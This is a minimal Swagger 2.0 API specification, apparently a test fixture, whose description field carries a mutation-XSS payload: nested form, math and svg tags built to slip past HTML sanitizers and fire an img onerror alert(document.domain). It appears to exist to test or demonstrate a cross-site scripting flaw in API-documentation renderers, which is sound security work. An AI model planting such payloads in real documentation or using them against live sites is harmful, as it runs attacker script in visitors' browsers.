{
  "swagger": "2.0",
  "info": {
    "title": "API Documentation",
    "description": "<form><math><mtext></form><form><mglyph><svg><mtext><title><a title=\"</title><img src onerror=alert(document.domain)>\">",
    "version": "1.0"
  },
  "host": "example.com",
  "basePath": "/",
  "schemes": ["https"],
  "paths": {
    "/test": {
      "get": {
        "summary": "Test endpoint",
        "description": "Normal endpoint",
        "produces": ["application/json"],
        "responses": {
          "200": {
            "description": "Success"
          }
        }
      }
    }
  }
}
